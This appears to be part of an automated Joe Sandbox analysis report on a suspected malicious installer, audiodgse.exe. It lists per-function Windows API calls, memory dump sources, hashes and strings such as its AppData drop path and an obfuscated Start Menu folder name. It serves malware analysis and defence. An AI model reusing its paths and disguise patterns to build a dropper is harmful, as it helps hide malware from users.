                                                  • Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                                  • Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
                                                  • Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                                  • Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,72BE1233,?,72BE12CF,-72BE404B,72BE11AB,-000000A0), ref: 72BE121D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true
                                                  • Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  • Opcode ID: feed3716df8a3bcb49e9267c54c013e1c246bc60679a75b1b3684e07f2787ff6
                                                  • Instruction ID: cd02e973c50056cb8e0b7e8d33e8e6b21dadecc86c39e7b9c183e341860647f4
                                                  • Opcode Fuzzy Hash: feed3716df8a3bcb49e9267c54c013e1c246bc60679a75b1b3684e07f2787ff6
                                                  • Instruction Fuzzy Hash: 90A00172D84100DADEA29AE2894AB243A21A748B81F208858E31556196867940149B25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404549
                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404573
                                                  • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404624
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040462F
                                                  • lstrcmpiA.KERNEL32(Call,Trochidae Setup: Installing,00000000,?,?), ref: 00404661
                                                  • lstrcatA.KERNEL32(?,Call), ref: 0040466D
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040467F
                                                    • Part of subcall function 004056DA: GetDlgItemTextA.USER32 ref: 004056ED
                                                    • Part of subcall function 00406244: CharNextA.USER32(?), ref: 0040629C
                                                    • Part of subcall function 00406244: CharNextA.USER32(?), ref: 004062A9
                                                    • Part of subcall function 00406244: CharNextA.USER32(?), ref: 004062AE
                                                    • Part of subcall function 00406244: CharPrevA.USER32(?,?), ref: 004062BE
                                                  • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 0040473D
                                                  • MulDiv.KERNEL32 ref: 00404758
                                                    • Part of subcall function 004048B1: lstrlenA.KERNEL32(Trochidae Setup: Installing,Trochidae Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
                                                    • Part of subcall function 004048B1: wsprintfA.USER32 ref: 00404957
                                                    • Part of subcall function 004048B1: SetDlgItemTextA.USER32(?,Trochidae Setup: Installing), ref: 0040496A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Trochidae Setup: Installing$jl-
                                                  • API String ID: 2624150263-1779906304
                                                  • Opcode ID: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
                                                  • Instruction ID: a574bab901635a86c0a25b0ea1efcbf713871747dcedb108b051a9d89a4042ab
                                                  • Opcode Fuzzy Hash: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
                                                  • Instruction Fuzzy Hash: E9A16FB1900219ABDB11EFA5CD41AAFB7B8EF85315F10843BF601B62D1D77C8A418F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CoCreateInstance.OLE32(00407410,?,00000001,00407400,?), ref: 004021BA
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 004021FA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers
                                                  • API String ID: 123533781-1636881305
                                                  • Opcode ID: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
                                                  • Instruction ID: 364dec1ee03e4b34996bd20462589a1769652030a90c2beac7f749610b7a86d9
                                                  • Opcode Fuzzy Hash: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
                                                  • Instruction Fuzzy Hash: 30511871E00209AFCB00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
                                                  • Instruction ID: 2655497eb84a062ae037f6c25fa5e5de2408fe63ae01e39025771dd9bbe68540
                                                  • Opcode Fuzzy Hash: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
                                                  • Instruction Fuzzy Hash: 3BF0A0B2644101AAD701EBB49A49AEEB768EB11324F60417BE241F21C1D2BC89459B6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404A84
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404A91
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AE0
                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404AF7
                                                  • SetWindowLongA.USER32(?,000000FC,00405075), ref: 00404B11
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B23
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B37
                                                  • SendMessageA.USER32 ref: 00404B4D
                                                  • SendMessageA.USER32 ref: 00404B59
                                                  • SendMessageA.USER32 ref: 00404B69
                                                  • DeleteObject.GDI32(00000110), ref: 00404B6E
                                                  • SendMessageA.USER32 ref: 00404B99
                                                  • SendMessageA.USER32 ref: 00404BA5
                                                  • SendMessageA.USER32 ref: 00404C3F
                                                  • SendMessageA.USER32 ref: 00404C6F
                                                    • Part of subcall function 0040409D: SendMessageA.USER32 ref: 004040AB
                                                  • SendMessageA.USER32 ref: 00404C83
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404CB1
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CBF
                                                  • ShowWindow.USER32(?,00000005), ref: 00404CCF
                                                  • SendMessageA.USER32 ref: 00404DCA
                                                  • SendMessageA.USER32 ref: 00404E2F
                                                  • SendMessageA.USER32 ref: 00404E44
                                                  • SendMessageA.USER32 ref: 00404E68
                                                  • SendMessageA.USER32 ref: 00404E88
                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00404E9D
                                                  • GlobalFree.KERNEL32(00000000), ref: 00404EAD
                                                  • SendMessageA.USER32 ref: 00404F26
                                                  • SendMessageA.USER32 ref: 00404FCF
                                                  • SendMessageA.USER32 ref: 00404FDE
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FFE
                                                  • ShowWindow.USER32(?,00000000), ref: 0040504C
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405057
                                                  • ShowWindow.USER32(00000000), ref: 0040505E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N$jl-
                                                  • API String ID: 2564846305-2707505489
                                                  • Opcode ID: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
                                                  • Instruction ID: 966653e8360bab3e2fc21879108ab338c3bc3285e0cd99f232f5bc98bb3d6c0f
                                                  • Opcode Fuzzy Hash: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
                                                  • Instruction Fuzzy Hash: 86025CB0900209AFDB10DF64DC45AAE7BB9FB84314F10813AFA15BA2E0D7799E41DF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N$jl-
                                                  • API String ID: 3103080414-2335472926
                                                  • Opcode ID: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
                                                  • Instruction ID: a86fe1b261e308fa50e110e5a31abfd90c360c5de8850f7aae14d0f145b03158
                                                  • Opcode Fuzzy Hash: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
                                                  • Instruction Fuzzy Hash: 1561A0B1A00209BBEB109F61DD45F6A7B69FB84705F008036FB01BA2D1C7B8A951CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32 ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32 ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
                                                  • Instruction ID: e0713781b635691343a74aeb4589e3ea90c77733c460a74728c978b7faf409cc
                                                  • Opcode Fuzzy Hash: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
                                                  • Instruction Fuzzy Hash: A7419C71804249AFCF058FA4CD459BFBFB9FF44310F00812AF561AA2A0C738AA50DFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405C7A
                                                  • GetShortPathNameA.KERNEL32 ref: 00405C83
                                                    • Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
                                                    • Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A
                                                  • GetShortPathNameA.KERNEL32 ref: 00405CA0
                                                  • wsprintfA.USER32 ref: 00405CBE
                                                  • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405CF9
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D08
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D40
                                                  • SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D96
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405DA7
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405DAE
                                                    • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\AppData\Roaming\audiodgse.exe,80000000,00000003), ref: 00405B77
                                                    • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2171350718-1727408572
                                                  • Opcode ID: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
                                                  • Instruction ID: 6ce2b9c5035192946699426d8eaee961ce023100f281e1c8236941499ee81097
                                                  • Opcode Fuzzy Hash: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
                                                  • Instruction Fuzzy Hash: 19311331605B19ABD6207B659C4CFAB3A6CDF45714F14003BFA01FA2D2E67CA8018EBD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • "C:\Users\user\AppData\Roaming\audiodgse.exe" , xrefs: 00406280
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406245
                                                  • *?|<>/":, xrefs: 0040628C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\AppData\Roaming\audiodgse.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-3491598343
                                                  • Opcode ID: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
                                                  • Instruction ID: 98a55a52ac5494643caf5fd5857683424a9a77f1076ac2e6562e20d377716777
                                                  • Opcode Fuzzy Hash: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
                                                  • Instruction Fuzzy Hash: EE11E25180879029EB3226344C40B7B7F988F5B760F2904FFE9D6722C2D67C5C52876E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
                                                  • Instruction ID: 778babcb3f3cb4702814cedc7f3687c69535c8aec6342fb1ab2b401637f1774e
                                                  • Opcode Fuzzy Hash: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
                                                  • Instruction Fuzzy Hash: 8A21C7715047049BC7309F78DC4CB5BBBF8AF91710B048A2AEA96A62E0D334E884CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 72BE1215: GlobalAlloc.KERNELBASE(00000040,72BE1233,?,72BE12CF,-72BE404B,72BE11AB,-000000A0), ref: 72BE121D
                                                  • GlobalFree.KERNEL32(?), ref: 72BE25DE
                                                  • GlobalFree.KERNEL32(00000000), ref: 72BE2618
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true
                                                  • Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 89c5f2622ed8e45f7c8feb53599205adad0d961d3e9e9822aa19461855ac5ead
                                                  • Instruction ID: 837cee6d95261a52782dfe6fa1566e51d3e6ea238b0f77762d7ee2db03daf114
                                                  • Opcode Fuzzy Hash: 89c5f2622ed8e45f7c8feb53599205adad0d961d3e9e9822aa19461855ac5ead
                                                  • Instruction Fuzzy Hash: 9941CEB2D44200EFD3268F68CDA4E2A7BFAEB85744F20496DF54387242DB359D08DB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
